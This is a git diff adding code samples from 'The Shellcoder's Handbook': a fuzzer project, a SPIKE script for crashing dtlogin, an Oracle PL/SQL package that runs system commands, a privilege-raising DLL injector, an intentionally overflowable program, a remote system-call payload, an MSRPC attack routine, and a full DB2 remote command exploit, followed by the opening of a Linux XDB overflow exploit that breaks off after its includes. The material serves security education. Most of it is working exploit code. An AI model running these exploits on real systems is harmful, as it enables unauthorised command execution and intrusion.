diff --git a/Chapter_14/src/RIOT.dsp b/Chapter_14/src/RIOT.dsp
new file mode 100644
index 0000000..ded1ab8
--- /dev/null
+++ b/Chapter_14/src/RIOT.dsp
@@ -0,0 +1,112 @@
+# Microsoft Developer Studio Project File - Name="RIOT" - Package Owner=<4>
+# Microsoft Developer Studio Generated Build File, Format Version 6.00
+# ** DO NOT EDIT **
+
+# TARGTYPE "Win32 (x86) Console Application" 0x0103
+
+CFG=RIOT - Win32 Debug
+!MESSAGE This is not a valid makefile. To build this project using NMAKE,
+!MESSAGE use the Export Makefile command and run
+!MESSAGE 
+!MESSAGE NMAKE /f "RIOT.mak".
+!MESSAGE 
+!MESSAGE You can specify a configuration when running NMAKE
+!MESSAGE by defining the macro CFG on the command line. For example:
+!MESSAGE 
+!MESSAGE NMAKE /f "RIOT.mak" CFG="RIOT - Win32 Debug"
+!MESSAGE 
+!MESSAGE Possible choices for configuration are:
+!MESSAGE 
+!MESSAGE "RIOT - Win32 Release" (based on "Win32 (x86) Console Application")
+!MESSAGE "RIOT - Win32 Debug" (based on "Win32 (x86) Console Application")
+!MESSAGE 
+
+# Begin Project
+# PROP AllowPerConfigDependencies 0
+# PROP Scc_ProjName ""
+# PROP Scc_LocalPath ""
+CPP=cl.exe
+RSC=rc.exe
+
+!IF  "$(CFG)" == "RIOT - Win32 Release"
+
+# PROP BASE Use_MFC 0
+# PROP BASE Use_Debug_Libraries 0
+# PROP BASE Output_Dir "Release"
+# PROP BASE Intermediate_Dir "Release"
+# PROP BASE Target_Dir ""
+# PROP Use_MFC 0
+# PROP Use_Debug_Libraries 0
+# PROP Output_Dir "Release"
+# PROP Intermediate_Dir "Release"
+# PROP Target_Dir ""
+# ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c
+# ADD CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c
+# ADD BASE RSC /l 0x409 /d "NDEBUG"
+# ADD RSC /l 0x409 /d "NDEBUG"
+BSC32=bscmake.exe
+# ADD BASE BSC32 /nologo
+# ADD BSC32 /nologo
+LINK32=link.exe
+# ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386
+# ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386
+
+!ELSEIF  "$(CFG)" == "RIOT - Win32 Debug"
+
+# PROP BASE Use_MFC 0
+# PROP BASE Use_Debug_Libraries 1
+# PROP BASE Output_Dir "Debug"
+# PROP BASE Intermediate_Dir "Debug"
+# PROP BASE Target_Dir ""
+# PROP Use_MFC 0
+# PROP Use_Debug_Libraries 1
+# PROP Output_Dir "Debug"
+# PROP Intermediate_Dir "Debug"
+# PROP Target_Dir ""
+# ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c
+# ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c
+# ADD BASE RSC /l 0x409 /d "_DEBUG"
+# ADD RSC /l 0x409 /d "_DEBUG"
+BSC32=bscmake.exe
+# ADD BASE BSC32 /nologo
+# ADD BSC32 /nologo
+LINK32=link.exe
+# ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept
+# ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept
+
+!ENDIF 
+
+# Begin Target
+
+# Name "RIOT - Win32 Release"
+# Name "RIOT - Win32 Debug"
+# Begin Group "source"
+
+# PROP Default_Filter ".cpp"
+# Begin Source File
+
+SOURCE=.\FaultInject.cpp
+# End Source File
+# Begin Source File
+
+SOURCE=.\NetIO.cpp
+# End Source File
+# Begin Source File
+
+SOURCE=.\RIOT.cpp
+# End Source File
+# End Group
+# Begin Group "include"
+
+# PROP Default_Filter ""
+# Begin Source File
+
+SOURCE=.\FaultInject.h
+# End Source File
+# Begin Source File
+
+SOURCE=.\NetIO.h
+# End Source File
+# End Group
+# End Target
+# End Project
diff --git a/Chapter_14/src/RIOT.dsw b/Chapter_14/src/RIOT.dsw
new file mode 100644
index 0000000..c8ecf7a
--- /dev/null
+++ b/Chapter_14/src/RIOT.dsw
@@ -0,0 +1,29 @@
+Microsoft Developer Studio Workspace File, Format Version 6.00
+# WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
+
+###############################################################################
+
+Project: "RIOT"=".\RIOT.dsp" - Package Owner=<4>
+
+Package=<5>
+{{{
+}}}
+
+Package=<4>
+{{{
+}}}
+
+###############################################################################
+
+Global:
+
+Package=<5>
+{{{
+}}}
+
+Package=<3>
+{{{
+}}}
+
+###############################################################################
+
diff --git a/Chapter_14/src/input_store/1.dat b/Chapter_14/src/input_store/1.dat
new file mode 100644
index 0000000..b084805
--- /dev/null
+++ b/Chapter_14/src/input_store/1.dat
@@ -0,0 +1,10 @@
+GET /search.ida?group=kuroto&q=riot HTTP/1.1
+Accept: */*
+Accept-Language: en-us
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/4.0
+Host: 192.168.1.1
+Connection: Keep-Alive
+Cookie: ASPSESSIONIDQNNNNTEG=ODDDDIOANNCXXXXIIMGLLNNG
+
+
diff --git a/Chapter_14/src/input_store/2.dat b/Chapter_14/src/input_store/2.dat
new file mode 100644
index 0000000..885e2f9
--- /dev/null
+++ b/Chapter_14/src/input_store/2.dat
@@ -0,0 +1,9 @@
+GET /eeye.printer?varname=vardat HTTP/1.1
+Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
+Accept-Language: en-us
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/4.0
+Host: www.kuroto.na
+Connection: Keep-Alive
+Cache-Control: no-cache
+
diff --git a/Chapter_14/src/input_store/3.dat b/Chapter_14/src/input_store/3.dat
new file mode 100644
index 0000000..63d7a54
--- /dev/null
+++ b/Chapter_14/src/input_store/3.dat
@@ -0,0 +1,9 @@
+GET /eeye.htr?varname=vardat HTTP/1.1
+Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
+Accept-Language: en-us
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/4.0
+Host: www.kuruoto.na
+Connection: Keep-Alive
+Cache-Control: no-cache
+
diff --git a/Chapter_15/Shellcoders15-dtloginspike.txt b/Chapter_15/Shellcoders15-dtloginspike.txt
new file mode 100644
index 0000000..c35c35b
--- /dev/null
+++ b/Chapter_15/Shellcoders15-dtloginspike.txt
@@ -0,0 +1,85 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 15: Art of Fuzzing
+dtlogin SPIKE
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+//xdmcp_request.spk
+//compatable with SPIKE 2.6 or above
+//port 177 UDP
+//use these requests to crash it:
+//[dave@localhost src]$ ./generic_send_udp 192.168.1.104 177 ~/spikePRIVATE/xdmcp_request.spk 2 28 2 
+//[dave@localhost src]$ ./generic_send_udp 192.168.1.104 177 ~/spikePRIVATE/xdmcp_request.spk 4 19 1
+
+//version
+s_binary("00 01");
+//Opcode (request=07)
+//3 is onebyte
+//5 is two byte big endian
+s_int_variable(0x0007,5);
+//message length
+//s_binary("00 17 ");
+s_binary_block_size_halfword_bigendian("message");
+s_block_start("message");
+//display number
+s_int_variable(0x0001,5);
+//connections
+s_binary("01");
+//internet type
+s_int_variable(0x0000,5);
+//address 192.168.1.100
+//connection 1
+s_binary("01");
+//size in bytes
+//s_binary("00 04");
+s_binary_block_size_halfword_bigendian("ip");
+//ip
+s_block_start("ip");
+s_binary("c0 a8 01 64");
+s_block_end("ip");
+//authentication name
+//s_binary("00 00");
+s_binary_block_size_halfword_bigendian("authname");
+s_block_start("authname");
+s_string_variable("");
+s_block_end("authname");
+
+//authentication data
+s_binary_block_size_halfword_bigendian("authdata");
+s_block_start("authdata");
+s_string_variable("");
+s_block_end("authdata");
+//s_binary("00 00");
+//authorization names (2)
+//3 is one byte
+s_int_variable(0x02,3);
+
+//size of string in big endian halfword order
+s_binary_block_size_halfword_bigendian("MIT");
+s_block_start("MIT");
+s_string_variable("MIT-MAGIC-COOKIE-1");
+s_block_end("MIT");
+
+
+s_binary_block_size_halfword_bigendian("XC");
+s_block_start("XC");
+s_string_variable("XC-QUERY-SECURITY-1");
+s_block_end("XC");
+
+
+//manufacture display id
+s_binary_block_size_halfword_bigendian("DID");
+s_block_start("DID");
+s_string_variable("");
+s_block_end("DID");
+
+s_block_end("message");
diff --git a/Chapter_17/Shellcoders17sampleprogram01.txt b/Chapter_17/Shellcoders17sampleprogram01.txt
new file mode 100644
index 0000000..f539611
--- /dev/null
+++ b/Chapter_17/Shellcoders17sampleprogram01.txt
@@ -0,0 +1,40 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 17: Instrumented Investigation
+Sample Program #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+Rem
+Rem oracmd.sql 
+Rem 
+Rem Run system commands via Oracle database servers 
+Rem 
+Rem Bugs to david@ngssoftware.com 
+Rem 
+
+CREATE OR REPLACE LIBRARY exec_shell AS 
+'C:\winnt\system32\msvcrt.dll'; 
+/ 
+show errors 
+CREATE OR REPLACE PACKAGE oracmd IS 
+PROCEDURE exec (cmdstring IN CHAR); 
+end oracmd; 
+/ 
+show errors 
+CREATE OR REPLACE PACKAGE BODY oracmd IS 
+PROCEDURE exec(cmdstring IN CHAR) 
+IS EXTERNAL 
+NAME "system" 
+LIBRARY exec_shell 
+LANGUAGE C; end oracmd;
+/
+show errors
diff --git a/Chapter_18/Shellcoders18-vtinject-cpp.txt b/Chapter_18/Shellcoders18-vtinject-cpp.txt
new file mode 100644
index 0000000..adb1900
--- /dev/null
+++ b/Chapter_18/Shellcoders18-vtinject-cpp.txt
@@ -0,0 +1,128 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 18: Tracing for Vulnerabilities
+VTInject.cpp
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+/***********************************************************************************\
+
+VTInject.cpp
+
+VTInject will adjust the privilege of the current process so we can access processes operating as LOCALSYSTEM. Once the privileges are adjusted VTInject will open a handle to the target process id (PID) and load our VulnTrace.DLL into the process. 
+
+\***********************************************************************************/
+
+
+#include <stdio.h>
+#include <windows.h>
+#include "detours.h"
+
+#define DLLNAME "\\VulnTrace.dll"
+
+int CDECL inject_dll(DWORD nProcessId, char *szDllPath)
+{
+     HANDLE token;
+     TOKEN_PRIVILEGES tkp;
+     HANDLE hProc;
+     
+     if(OpenProcessToken(     GetCurrentProcess(), 
+                     TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, 
+                    &token) == FALSE)
+     {
+          fprintf(stderr, "OpenProcessToken Failed: 0x%X\n", GetLastEr-ror());
+          return(-1);
+     }
+     if(LookupPrivilegeValue(     NULL, 
+                         "SeDebugPrivilege", 
+                         &tkp.Privileges[0].Luid) == FALSE)
+     {
+          fprintf(stderr, "LookupPrivilegeValue failed: 0x%X\n", GetLas-tError());
+          return(-1);
+     }
+
+     tkp.PrivilegeCount = 1;
+     tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+
+     if(AdjustTokenPrivileges(     token, FALSE, &tkp, 0, NULL, NULL) == FALSE)
+     {
+          fprintf(stderr,
+          
+               “AdjustTokenPrivileges Failed: 0x%X\n", 
+
+          GetLastError());
+
+          return(-1);
+     }
+
+     CloseHandle(token);
+
+     hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, nProcessId);
+     if (hProc == NULL)
+     {
+          fprintf(stderr,
+
+               "[VTInject]: OpenProcess(%d) failed: %d\n",
+               
+          nProcessId, GetLastError());
+          return(-1);
+     }
+      
+     fprintf(stderr, 
+          
+          "[VTInject]: Loading %s into %d.\n", 
+
+     szDllPath, nProcessId);
+     
+     fflush(stdout);
+    
+     if (!DetourContinueProcessWithDllA(hProc, szDllPath))
+     {
+          fprintf(stderr,
+          
+               "DetourContinueProcessWithDll(%s) failed: %d",
+          
+          szDllPath, GetLastError());
+          
+          return(-1);
+     }
+
+     return(0);
+}
+
+int main(int argc, char **argv)
+{
+     char path[1024];
+     int plen;
+
+     if(argc!= 2)
+     {
+          fprintf(stderr,     
+
+               "\n-= VulnTrace =-\n\n"
+               "\tUsage: %s <process_id>\n\n"
+
+          ,argv[0]);
+
+          return(-1);
+     }
+
+
+     plen = GetCurrentDirectory(sizeof(path)-1, path);
+     strncat(path, DLLNAME, (sizeof(path)-plen)-1);
+     if(inject_dll(atoi(argv[1]), path))
+     {
+          fprintf(stderr, "Injection Failed\n");
+          return(-1);
+     }
+
+     return(0);
+};
diff --git a/Chapter_18/Shellcoders18-vulntrace-cpp.txt b/Chapter_18/Shellcoders18-vulntrace-cpp.txt
new file mode 100644
index 0000000..cd6167b
--- /dev/null
+++ b/Chapter_18/Shellcoders18-vulntrace-cpp.txt
@@ -0,0 +1,96 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 18: Tracing for Vulnerabilities
+vulntrace.cpp
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+/*
+ *  VulnTrace.cpp 
+ */
+
+#include "stdafx.h"
+#include <windows.h>
+#include <stdio.h>
+#include "detours.h"
+
+DWORD get_mem_size(char *block)
+{
+     DWORD     fnum=0,
+               memsize=0,     
+               *frame_ptr=NULL,
+               *prev_frame_ptr=NULL,
+               *stack_base=NULL,
+               *stack_top=NULL;
+     
+     __asm mov eax, dword ptr fs:[4]
+     __asm mov stack_base, eax
+     __asm mov eax, dword ptr fs:[8]
+     __asm mov stack_top, eax
+     __asm mov frame_ptr, ebp
+
+     if( block < (char *)stack_base && block > (char *)stack_top)
+     for(fnum=0;fnum<=5;fnum++)
+     {
+          if( frame_ptr < (DWORD *)stack_base && frame_ptr > stack_top)
+          {
+               prev_frame_ptr = (DWORD *)*frame_ptr;
+
+               if( prev_frame_ptr < stack_base && prev_frame_ptr > stack_top)
+               {
+                    if(frame_ptr < (DWORD *)block && (DWORD *)block < prev_frame_ptr)
+                    {     
+                         memsize = (DWORD)prev_frame_ptr - (DWORD)block;
+                         break;
+                    }
+                    else
+                         frame_ptr = prev_frame_ptr;
+               }
+          }     
+     } 
+
+     return(memsize);
+}
+
+DETOUR_TRAMPOLINE(char * WINAPI real_lstrcpynA(char *dest,char *source,int maxlen), lstrcpynA);
+
+
+char * WINAPI vt_lstrcpynA (char *dest,char *source,int maxlen)
+{
+        char dbgmsg[1024];
+        LPTSTR retval;
+
+        _snprintf(dbgmsg, sizeof(dbgmsg), "[VulnTrace]: lstrcpynA(0x%08x:[%d], %s, %d)\n",dest,get_mem_size(dest), source, max-len);
+        dbgmsg[sizeof(dbgmsg)-1] = 0;
+        
+        OutputDebugString(dbgmsg);
+
+        retval = real_lstrcpynA(dest, source, maxlen);
+        
+        return(retval);
+}
+
+BOOL APIENTRY DllMain(     HANDLE hModule, 
+                              DWORD  ul_reason_for_call, 
+                              LPVOID lpReserved
+                          )
+{
+    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
+     {
+               DetourFunctionWithTrampoline((PBYTE)real_lstrcpynA, (PBYTE)vt_lstrcpynA);
+     }
+    else if (ul_reason_for_call == DLL_PROCESS_DETACH)
+     {
+          OutputDebugString("[*] Unloading VulnTrace\n");
+    }
+
+    return TRUE;
+}
diff --git a/Chapter_18/Shellcoders18sampleprogram01.txt b/Chapter_18/Shellcoders18sampleprogram01.txt
new file mode 100644
index 0000000..43aa653
--- /dev/null
+++ b/Chapter_18/Shellcoders18sampleprogram01.txt
@@ -0,0 +1,51 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 18: Tracing for Vulnerabilities
+Sample Program #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+/* Vulnerable Program (vuln.c)*/
+ 
+#include <windows.h>
+#include <stdio.h>
+
+#define USERMAXSIZE     32
+#define USERMAXLEN     16
+
+int check_username(char *username)
+{
+     char buffer[USERMAXLEN];
+
+     lstrcpynA(buffer, username, USERMAXSIZE-1);
+
+     /*
+          Other function code to examine username
+          ...
+     */
+
+     return(0);
+}
+
+int main(int argc, char **argv)
+{
+     if(argc != 2)
+     {
+          fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
+          exit(-1);
+     }
+     while(1)
+     {
+          check_username(argv[1]);
+          Sleep(1000);
+     }
+     return(0);
+}
diff --git a/Chapter_20/Shellcoders20-rsc-c.txt b/Chapter_20/Shellcoders20-rsc-c.txt
new file mode 100644
index 0000000..418f906
--- /dev/null
+++ b/Chapter_20/Shellcoders20-rsc-c.txt
@@ -0,0 +1,247 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 20: Alternative Payload Strategies
+rsc.c
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+// rsc.c
+// Simple windows remote system call mechanism
+
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int Marshall( unsigned char flags, unsigned size, unsigned char *data, unsigned char *out, unsigned out_len )
+{
+     out[0] = flags;
+     *((unsigned *)(&(out[1]))) = size;
+     memcpy( &(out[5]), data, size );
+
+     return size + 5;
+}
+
+////////////////////////////
+// Parameter Flags /////////
+////////////////////////////
+
+// this thing is a pointer to a thing, rather than the thing itself
+#define IS_PTR     0x01
+
+// everything is either in, out or in | out
+#define IS_IN     0x02 
+#define IS_OUT     0x04
+
+// null terminated data
+#define IS_SZ     0x08
+
+// null short terminated data (e.g. unicode string)
+#define IS_SZZ     0x10
+
+
+////////////////////////////
+// Function Flags //////////
+////////////////////////////
+
+// function is __cdecl (default is __stdcall)
+#define FN_CDECL     0x01
+
+
+int AsmDemarshallAndCall( unsigned char *buff, void *loadlib, void *getproc )
+{
+     // params:
+     // ebp: dllname
+     // +4     : fnname
+     // +8     : num_params
+     // +12     : out_param_size
+     // +16     : function_flags
+     // +20     : params_so_far
+     // +24     : loadlibrary
+     // +28     : getprocaddress
+     // +32     : address of out data buffer
+
+     _asm
+     {
+     // set up params - this is a little complicated
+     // due to the fact we're calling a function with inline asm
+
+          push ebp
+          sub esp, 0x100
+          mov ebp, esp
+          mov ebx, dword ptr[ebp+0x158]; // buff
+          mov dword ptr [ebp + 12], 0;
+          mov eax, dword ptr [ebp+0x15c];//loadlib
+          mov dword ptr[ebp + 24], eax;
+          mov eax, dword ptr [ebp+0x160];//getproc
+          mov dword ptr[ebp + 28], eax;
+
+          mov dword ptr [ebp], ebx; // ebx = dllname
+
+          sub esp, 0x800;          // give ourselves some data space
+          mov dword ptr[ebp + 32], esp;
+
+          jmp start;
+
+          // increment ebx until it points to a '0' byte
+skip_string:
+          mov al, byte ptr [ebx];
+          cmp al, 0;
+          jz done_string;
+          inc ebx;
+          jmp skip_string;
+
+done_string:
+          inc ebx;
+          ret;
+
+start:
+          // so skip the dll name
+          call skip_string;
+
+          // store function name
+          mov dword ptr[ ebp + 4 ], ebx
+
+          // skip the function name
+          call skip_string;
+               
+          // store parameter count
+          mov ecx, dword ptr [ebx]
+          mov edx, ecx
+          mov dword ptr[ ebp + 8 ], ecx
+
+          // store out param size
+          add ebx,4
+          mov ecx, dword ptr [ebx]
+          mov dword ptr[ ebp + 12 ], ecx
+
+          // store function flags
+          add ebx,4
+          mov ecx, dword ptr [ebx]
+          mov dword ptr[ ebp + 16 ], ecx
+
+          add ebx,4
+
+// in this loop, edx holds the num parameters we have left to do.
+
+next_param:
+          cmp edx, 0
+          je call_proc
+          
+          mov cl, byte ptr[ ebx ];     // cl = flags
+          inc ebx;
+
+          mov eax, dword ptr[ ebx ];     // eax = size
+          add ebx, 4;
+
+          mov ch,cl;
+          and cl, 1;                         // is it a pointer?
+          jz not_ptr;
+
+          mov cl,ch;
+
+// is it an 'in' or 'inout' pointer?
+          and cl, 2;                         
+          jnz is_in;
+          
+                                   // so it's an 'out'
+                                   // get current data pointer
+          mov ecx, dword ptr [ ebp + 32 ]
+          push ecx
+
+// set our data pointer to end of data buffer
+          add dword ptr [ ebp + 32 ], eax          
+          add ebx, eax
+          dec edx
+          jmp next_param
+
+is_in:
+          push ebx                         
+
+// arg is 'in' or 'inout'
+// this implies that the data is contained in the received packet
+          add ebx, eax
+          dec edx
+          jmp next_param
+
+
+not_ptr:
+          mov eax, dword ptr[ ebx ];
+          push eax;
+          add ebx, 4
+          dec edx
+          jmp next_param;
+
+call_proc:
+          // args are now set up. let's call...
+          mov eax, dword ptr[ ebp ];
+          push eax;
+          mov eax, dword ptr[ ebp + 24 ];
+          call eax;
+          mov ebx, eax;
+          mov eax, dword ptr[ ebp + 4 ];
+          push eax;
+          push ebx;
+          mov eax, dword ptr[ ebp + 28 ];
+          call eax; // this is getprocaddress
+          call eax; // this is our function call
+
+          // now we tidy up
+          add esp, 0x800;
+          add esp, 0x100;
+          pop ebp
+     }
+
+     return 1;
+}
+
+
+
+int main( int argc, char *argv[] )
+{
+     unsigned char buff[ 256 ];
+     unsigned char *psz;
+     DWORD freq = 1234;
+     DWORD dur = 1234;
+     DWORD show = 0;
+     HANDLE hk32;
+     void *loadlib, *getproc;
+     char *cmd = "cmd /c dir > c:\\foo.txt";
+
+     psz = buff;
+
+     strcpy( psz, "kernel32.dll" );
+     psz += strlen( psz ) + 1;
+
+     strcpy( psz, "WinExec" );
+     psz += strlen( psz ) + 1;
+
+     *((unsigned *)(psz)) = 2;          // parameter count
+     psz += 4;
+
+     *((unsigned *)(psz)) = strlen( cmd ) + 1;     // parameter size
+     psz += 4;
+
+     // set fn_flags
+     *((unsigned *)(psz)) = 0;
+     psz += 4;
+
+     psz += Marshall( IS_IN, sizeof( DWORD ), (unsigned char *)&show, psz, sizeof( buff ) );
+     psz += Marshall( IS_PTR | IS_IN, strlen( cmd ) + 1, (unsigned char *)cmd, psz, sizeof( buff ) );
+
+     hk32 = LoadLibrary( "kernel32.dll" );
+     loadlib = GetProcAddress( hk32, "LoadLibraryA" );
+     getproc = GetProcAddress( hk32, "GetProcAddress" );
+
+     AsmDemarshallAndCall( buff, loadlib, getproc );
+
+     return 0;
+}
diff --git a/Chapter_21/Shellcoders21sampleprogram01.txt b/Chapter_21/Shellcoders21sampleprogram01.txt
new file mode 100644
index 0000000..db4ae38
--- /dev/null
+++ b/Chapter_21/Shellcoders21sampleprogram01.txt
@@ -0,0 +1,58 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 15: Writing Exploits that Work in the Wild
+Sample Program #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+def runTest(self):
+        UUID2K3="1d55b526-c137-46c5-ab79-638f2a68e869"
+        callid=1
+        error,s=msrpcbind(UUID2K3,1,0,self.host,self.port,callid)        
+        if error==0:
+            errstr="Could not bind to the msrpc service for 2K3,XP - as-suming NT 4 or Win2K"
+            self.log(errstr)
+        else:
+            if self.testFor2003(): #Simple test not shown here.
+                self.setVersion(15)
+                self.log("Test indicated connection succeeded to msrpc service.")
+                self.log("Attacking using version %d: %s"%(self.version,self.versions[self.version][0]))
+                return 1
+        
+        self.setVersion(1) #default to Win2K or XP
+        UUID2K="000001a0-0000-0000-c000-000000000046"
+        #only provided by 2K and above
+        callid=1
+        error,s=msrpcbind(UUID2K,0,0,self.host,self.port,callid)        
+        if error==0:
+            errstr="Could not bind to the msrpc service for 2K and above - assuming NT 4"
+            self.log(errstr)
+            self.setVersion(14) #NT4
+        else:
+            self.log("Test indicated connection succeeded to msrpc ser-vice.")
+            self.log("Attacking using version %d: %s"%(self.version,self.versions[self.version][0]))
+            return 1  #Windows 2000 or XP          
+        
+        callid=0
+        #IRemoteDispatch UUID
+        UUID="4d9f4ab8-7d1c-11cf-861e-0020af6e7c57"
+        error,s=msrpcbind(UUID,0,0,self.host,self.port,callid)
+        #error is reversed, sorry.
+        if error==0:
+            errstr="Could not bind to the msrpc service necessary to run the attack"
+            self.log(errstr)
+            return 0
+        #we assume it's vulnerable if we can bind to it
+        self.log("Test indicated connection succeeded to msrpc ser-vice.")
+        self.log("Attacking using version %d: %s"%(self.version,self.versions[self.version][0]))
+        
+
+        return 1 
diff --git a/Chapter_22/Shellcoders22-ibm-db2-exploit.txt b/Chapter_22/Shellcoders22-ibm-db2-exploit.txt
new file mode 100644
index 0000000..f6dc2c8
--- /dev/null
+++ b/Chapter_22/Shellcoders22-ibm-db2-exploit.txt
@@ -0,0 +1,77 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 22: Attacking Database Software
+IBM DB2 Exploit
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <windows.h>
+
+int main(int argc, char *argv[])
+{
+ char buffer[540]="";
+ char NamedPipe[260]="\\\\";
+ HANDLE rcmd=NULL;
+ char *ptr = NULL;
+ int len =0;
+ DWORD Bytes = 0;
+
+ if(argc !=3)
+ {
+  printf("\n\tDB2 Remote Command Exploit.\n\n");
+  printf("\tUsage: db2rmtcmd target \"command\"\n");
+  printf("\n\tDavid Litchfield\n\t(david@ngssoftware.com)\n\t6th Septem-ber 2003\n");
+  return 0;
+      }
+
+ strncat(NamedPipe,argv[1],200);
+ strcat(NamedPipe,"\\pipe\\DB2REMOTECMD");
+
+ // Setup handshake message
+ ZeroMemory(buffer,540);
+ buffer[0]=0x01;
+ ptr = &buffer[4];
+ strcpy(ptr,"DB2");
+ len = strlen(argv[2]);
+ buffer[532]=(char)len;
+
+ // Open the named pipe
+ rcmd = CreateFile(NamedPipe,GENERIC_WRITE|GENERIC_READ,0,
+NULL,OPEN_EXISTING,0,NULL);
+
+ if(rcmd == INVALID_HANDLE_VALUE)
+  return printf("Failed to open pipe %s. Error %d.\n",NamedPipe,GetLastError());
+
+ // Send handshake
+ len = WriteFile(rcmd,buffer,536,&Bytes,NULL);
+
+ if(!len)
+  return printf("Failed to write to %s. Error %d.\n",NamedPipe,GetLastError());
+
+ ZeroMemory(buffer,540);
+ strncpy(buffer,argv[2],254);
+
+ // Send command
+ len = WriteFile(rcmd,buffer,strlen(buffer),&Bytes,NULL);
+ if(!len)
+  return printf("Failed to write to %s. Error %d.\n",NamedPipe,GetLastError());
+
+ // Read results
+ while(len)
+ {
+  len = ReadFile(rcmd,buffer,530,&Bytes,NULL);
+  printf("%s",buffer);
+  ZeroMemory(buffer,540);
+      }
+
+ return 0;
+}
diff --git a/Chapter_22/Shellcoders22-xdb-exploit-linux.txt b/Chapter_22/Shellcoders22-xdb-exploit-linux.txt
new file mode 100644
index 0000000..e13742d
--- /dev/null
+++ b/Chapter_22/Shellcoders22-xdb-exploit-linux.txt
@@ -0,0 +1,215 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 22: Attacking Database Software
+Linux XDB overflow exploit
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+
+
